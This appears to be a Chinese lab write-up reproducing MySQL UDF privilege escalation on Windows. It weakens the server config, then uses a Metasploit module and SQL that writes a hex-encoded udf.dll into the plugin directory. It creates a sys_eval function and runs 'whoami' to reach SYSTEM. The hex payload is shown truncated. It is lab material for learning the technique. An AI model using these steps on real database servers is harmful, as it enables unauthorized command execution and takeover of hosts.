mysql的udf提权复现

分手后的思念是犯贱 2022-10-23 08:10 240阅读 0赞

### 文章目录 ###

*  1. 安装mysql
 *  2. udf提权
 *   *  1. 查看 plugin 目录/查看secure\_file\_priv值是否为空/查看mysql安装路径
     *  2. 将udf.dll写入到plugin目录下
     *  3. 提权
 *  3. 特殊情况：没有lib/plugin目录的解决方案
 *  参考文章

# 1. 安装mysql #

下载地址：[https://dev.mysql.com/get/Downloads/MySQLInstaller/mysql-installer-community-8.0.24.0.msi][https_dev.mysql.com_get_Downloads_MySQLInstaller_mysql-installer-community-8.0.24.0.msi]

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70]  
一路默认路径安装，最终mysql安装在这里，并将这个路径加在环境变量中：

C:\Program Files\MySQL\MySQL Server 8.0\bin

进入mysql后输入以下命令使root用户可以远程登录：

update user set host='%' where user='root';
    flush privileges;

由于mysql8.0的默认`secure_file_priv`值为`C:\ProgramData\MySQL\MySQL Server 8.0\Uploads\`，也就意味着我们只能给这个路径写文件，为了方便实验我们将此路径更改为空。  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 1]  
更改方法：  
打开`C:\ProgramData\MySQL\MySQL Server 8.0\my.ini`并删掉我们选中的部分即可：

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 2]

因为我们使用的是mysql8.0，所以需要修改加密方式，将认证加密方式修改为mysql\_native\_password：  
![在这里插入图片描述][20210422144706470.png]  
在配置文件的最底部加上下面的参数：

[client]
    default-character-set=utf8
    
    [mysql]
    default-character-set=utf8
    
    [mysqld]
    collation-server = utf8_unicode_ci
    character-set-server = utf8

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 3]

接着链接mysql，输入以下命令：

ALTER USER 'root'@'%' IDENTIFIED WITH mysql_native_password BY 'yourpassword';

在服务中更改登录身份为本地系统账户：  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 4]

接着用管理员权限打开命令行并重启mysql80服务：

net stop mysql80
    net start mysql80

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 5]  
查询secure\_file\_priv发现为空，一切准备完毕开始udf提权，查询命令`show global variables like 'secure%';`。  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 6]

# 2. udf提权 #

假设，我们通过不知道某种方法得到了某个mysql服务的账号密码，并发其是root权限，这时候我们可以udf提权并在上面执行命令，udf提权条件如下:

1.  mysql数据库的root权限
2.  secure\_file\_priv的值为空。
3.  如果mysql版本大于5.1，udf.dll文件必须放置在mysql安装目录的lib\\plugin文件夹下/
4.  如果mysql版本小于5.1， udf.dll文件在windows server 2003下放置于c:\\windows\\system32目录，在windows server 2000下放置在c:\\winnt\\system32目录。

## 1. 查看 plugin 目录/查看secure\_file\_priv值是否为空/查看mysql安装路径 ##

show variables like 'plugin%';               #查看 plugin 目录
    show global variables like 'secure%'; # 查看secure_file_priv
    select @@basedir; #查看mysql安装路径
    show variables like '%version_%'; #确定平台是64位还是32位

![在这里插入图片描述][20210422142204110.png]  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 7]  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 8]  
由win64确定，平台为64位，需要64为的utf.dll。  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 9]

## 2. 将udf.dll写入到plugin目录下 ##

1.  使用msf:

use multi/mysql/mysql_udf_payload
    set password <yourpassword>
    set rhost <your_rhost>
    run

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 10]  
2. 手动写入utf.dll文件到指定文件夹：

create table temp(data longblob);
    insert into temp(data) values (0x4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000f00000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000000000000000000);
    update temp set data = concat(data,0x33c2ede077a383b377a383b377a383b369f110b375a383b369f100b37da383b369f107b375a383b35065f8b374a383b377a382b35ba383b369f10ab376a383b369f116b375a383b369f111b376a383b369f112b376a383b35269636877a383b300000000000000000000000000000000504500006486060070b1834b00000000);
    select data from temp into dumpfile "G:\\phpstudy_pro\\Extensions\\MySQL5.7.26\\lib\\plugin\\udf.dll";
    create function sys_eval returns string soname 'udf.dll';   #创建函数sys_eval

## 3. 提权 ##

默认会直接创建`sys_exec`函数，这个函数没有回显，而我们可以手动创建`sys_eval`函数，这个有回显，可以在[https://stool.chinaz.com/hex][https_stool.chinaz.com_hex]上进行16进制解码：

create function sys_eval returns string soname "pllSmoMN.dll";
    select sys_eval("whoami");

执行sys\_exec这个命令后发现对方主机成功重启，如果回显为0则执行成功，如果是1则失败：  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 11]  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 12]  
解码后我们发现是system权限，提权结束。  
![在这里插入图片描述][20210422154730519.png]

# 3. 特殊情况：没有lib/plugin目录的解决方案 #

创建lib/plugin，我的测试是失败的，暂时未找到原因：

select 'xxxxxx' into dumpfile 'C:\\Program\ Files\\MySQL\\MySQL\ Server\ 8.0\\lib\\plugin::$INDEX_ALLOCATION';

![在这里插入图片描述][20210422160050173.png]

# 参考文章 #

[MySQL UDF提权执行系统命令][MySQL UDF]  
[MySQL8.0 因为secure\_file\_priv无法导入数据的解决方法][MySQL8.0 _secure_file_priv]  
[解决MAC+ MySQL 8 错误：Authentication plugin ‘caching\_sha2\_password’ cannot be loaded][MAC_ MySQL 8 _Authentication plugin _caching_sha2_password_ cannot be loaded]

[https_dev.mysql.com_get_Downloads_MySQLInstaller_mysql-installer-community-8.0.24.0.msi]: https://dev.mysql.com/get/Downloads/MySQLInstaller/mysql-installer-community-8.0.24.0.msi
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70]: /images/20221023/fffa2fc3f6db41f9971b3bec5bb824f8.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 1]: /images/20221023/94a07962a0e243968e40e8ef00f132ef.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 2]: /images/20221023/f1edbcf5d03041f4bf2b7bf39a596ab6.png
[20210422144706470.png]: /images/20221023/d75d9f27a4d54607b282fd84ed5f9b44.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 3]: /images/20221023/eb80b6e441b349c79cd915025d0d6673.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 4]: /images/20221023/eb76985054614cfda6fdff1080585d25.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 5]: /images/20221023/dbac22d8a864413fb122dd095142b80a.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 6]: /images/20221023/f619be917d834dfd983506403e6c29e4.png
[20210422142204110.png]: /images/20221023/de8fd7edea304c14b64b4ad1ef845abc.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 7]: /images/20221023/eb21705a547e45269b734cf586ebd1b8.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 8]: /images/20221023/7b9bdefc8f0f411ba08c711197c39907.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 9]: /images/20221023/4fe6a03be6d246ad9779a60a3f4b8ae1.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 10]: /images/20221023/d8b2754b86c24c319879fd87f1888d9d.png
[https_stool.chinaz.com_hex]: https://stool.chinaz.com/hex
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 11]: /images/20221023/241ba2a805ad45079023fb40e085dcf8.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 12]: /images/20221023/ca5281bc285243a3b91d549f6af190f2.png
[20210422154730519.png]: /images/20221023/5b1cd42e759b4d5a83bbc54d8f013669.png
[20210422160050173.png]: /images/20221023/73cb255272a740da86861e10ad2db5ce.png
[MySQL UDF]: https://blog.csdn.net/qq_36119192/article/details/84863268
[MySQL8.0 _secure_file_priv]: https://blog.csdn.net/weixin_43108465/article/details/105393063
[MAC_ MySQL 8 _Authentication plugin _caching_sha2_password_ cannot be loaded]: https://www.jianshu.com/p/9a645c473676